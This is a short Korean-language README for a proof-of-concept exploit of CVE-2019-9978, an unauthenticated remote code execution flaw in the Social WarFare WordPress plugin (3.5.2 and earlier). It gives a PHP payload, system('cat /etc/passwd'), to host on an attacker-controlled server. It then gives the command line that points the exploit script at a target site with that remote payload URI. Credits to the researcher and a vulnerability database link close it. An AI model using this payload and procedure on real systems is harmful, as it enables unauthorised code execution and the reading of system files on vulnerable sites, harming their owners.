
CVE-2019-9978 - (PoC) Social WarFare Plugin (<=3.5.2)에서의 RCE
CVE-2019-9978 - (PoC) Social WarFare 플러그인에서의 RCE (<=3.5.2)
설정 가져오기를 처리하는 기능에서 인증되지 않은 원격 코드 실행이 발견되었습니다. 사용자는 RFI를 활용하여 RCE를 수행할 수 있습니다.
다음 페이로드를 복사하세요:
<pre>system('cat /etc/passwd')</pre>
파일명 payload.txt로 저장하고 서버에 업로드하세요. URI는 다음과 같아야 합니다: http(s)://yoursite.com/payload.txt. 마지막으로, --target과 --payload-uri 옵션을 제공하세요:
$ python cve-2019-9978.py --target http://vulntarget.com \
--payload-uri http://yourpayloadsite.com/payload.txt

연구자: Luka Sikic
링크: https://wpvulndb.com/vulnerabilities/9259?fbclid=IwAR2xLSnanccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM
저자: @hash3liZer